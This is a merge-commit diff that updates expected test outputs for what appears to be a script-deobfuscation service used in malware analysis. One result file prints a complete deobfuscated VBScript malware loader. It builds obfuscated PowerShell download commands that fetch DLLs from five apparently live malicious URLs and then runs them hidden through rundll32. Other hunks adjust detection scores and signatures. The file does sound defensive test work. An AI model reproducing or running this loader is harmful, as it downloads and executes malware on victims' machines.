Merge pull request #75 from CybercentreCanada/fix_tests

Fix tests

tests/results/1b400b38af1288167d9818c394dd3231606264a837e12cd2632c70d829b01846/result.json

@@ -30,7 +30,7 @@
       },
       {
         "auto_collapse": false,
-        "body": "\\x00\\x02\\x8c\\x08(\\x00\\x00\\x00|\\x08\\x00\\x80Dim WAITPLZ, WS\nWAITPLZ = DateAdd(\"s\", 4, Now())\nDo Until (Now() > WAITPLZ)\nLoop\n\nLL1 = \"$Nano=\"IEX\";sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\\ProgramData\\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL2 = \"$Nanoz=\"IEX\";sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\\ProgramData\\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL3 = \"$Nanox=\"IEX\";sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\\ProgramData\\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL4 = \"$Nanoc=\"IEX\";sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\\ProgramData\\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL5 = \"$Nanoc=\"IEX\";sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\\ProgramData\\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\n\nSet Ran = CreateObject(\"wscript.shell\")\nRan.Run \"powershell \"+LL1,\"0\"\nRan.Run \"powershell \"+LL2,\"0\"\nRan.Run \"powershell \"+LL3,\"0\"\nRan.Run \"powershell \"+LL4,\"0\"\nRan.Run \"powershell \"+LL5,\"0\"\nWScript.Sleep(15000)\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www1.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www2.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www3.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www4.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www5.dll,ldr\", \"0\"\nW)\\x00\\x00\\<\\x00\\x00\\x00\\x02\\x18\\x005\\x00\\x00\\x00\\x06\\x00\\x00\\x80\\xa5\\x00\\x00\\x00\\xcc\\x02\\x00\\x00Tahoma\\x00\\x00",
+        "body": "\\x00\\x02\\x8c\\x08(\\x00\\x00\\x00|\\x08\\x00\\x80Dim WAITPLZ, WS\nWAITPLZ = DateAdd(\"s\", 4, Now())\nDo Until (Now() > WAITPLZ)\nLoop\n\nLL1 = \"$Nano=\"IEX\";sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://priyacareers.com/u9hDQN9Yy7g/pt.html'',''C:\\ProgramData\\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL2 = \"$Nanoz=\"IEX\";sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.com/Gv1iNAuMKZ/pt.html'',''C:\\ProgramData\\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL3 = \"$Nanox=\"IEX\";sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bussiness-z.ml/ze8pCNTIkrIS/pt.html'',''C:\\ProgramData\\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL4 = \"$Nanoc=\"IEX\";sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://cablingpoint.com/ByH5NDoE3kQA/pt.html'',''C:\\ProgramData\\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\nLL5 = \"$Nanoc=\"IEX\";sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html'',''C:\\ProgramData\\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\"\n\n\nSet Ran = CreateObject(\"WScript.Shell\")\nRan.Run \"powershell \"+LL1,\"0\"\nRan.Run \"powershell \"+LL2,\"0\"\nRan.Run \"powershell \"+LL3,\"0\"\nRan.Run \"powershell \"+LL4,\"0\"\nRan.Run \"powershell \"+LL5,\"0\"\nWScript.Sleep(15000)\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www1.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www2.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www3.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www4.dll,ldr\", \"0\"\nRan.Run \"cmd /c rundll32.exe C:\\ProgramData\\www5.dll,ldr\", \"0\"\nW)\\x00\\x00\\<\\x00\\x00\\x00\\x02\\x18\\x005\\x00\\x00\\x00\\x06\\x00\\x00\\x80\\xa5\\x00\\x00\\x00\\xcc\\x02\\x00\\x00Tahoma\\x00\\x00",
         "body_config": {},
         "body_format": "MEMORY_DUMP",
         "classification": "TLP:C",

tests/results/f50053ccd6d8cd18e2736166ce8376bba8bc673c49af7d96dfb8dff7ec9bf715/result.json

@@ -1,11 +1,11 @@
 {
   "extra": {
     "drop_file": false,
-    "score": 40,
+    "score": 50,
     "sections": [
       {
         "auto_collapse": false,
-        "body": "Hex Charcodes, 1 time(s).\nconcatenation, 1 time(s).\ndecoded.hexadecimal, 1 time(s).\nencoding.base64, 1 time(s).",
+        "body": "Hex Charcodes, 1 time(s).\nMixedCase, 1 time(s).\nconcatenation, 1 time(s).\ndecoded.hexadecimal, 1 time(s).\nencoding.base64, 1 time(s).",
         "body_config": {},
         "body_format": "TEXT",
         "classification": "TLP:C",
@@ -14,10 +14,11 @@
           "attack_ids": [],
           "frequency": 1,
           "heur_id": 1,
-          "score": 40,
+          "score": 50,
           "score_map": {},
           "signatures": {
             "Hex Charcodes": 1,
+            "MixedCase": 1,
             "concatenation": 1,
             "decoded.hexadecimal": 1,
             "encoding.base64": 1
@@ -54,6 +55,7 @@
         "heur_id": 1,
         "signatures": [
           "Hex Charcodes",
+          "MixedCase",
           "concatenation",
           "decoded.hexadecimal",
           "encoding.base64"

tests/test_deobfuscripter_samples.py

@@ -15,7 +15,7 @@
 # Initialize test helper
 service_class = load_module_by_path("deobs.DeobfuScripter", os.path.join(os.path.dirname(__file__), ".."))
 th = TestHelper(service_class, RESULTS_FOLDER, SAMPLES_FOLDER)
-
+th.regenerate_results()
 
 @pytest.mark.parametrize("sample", th.result_list())
 def test_sample(sample):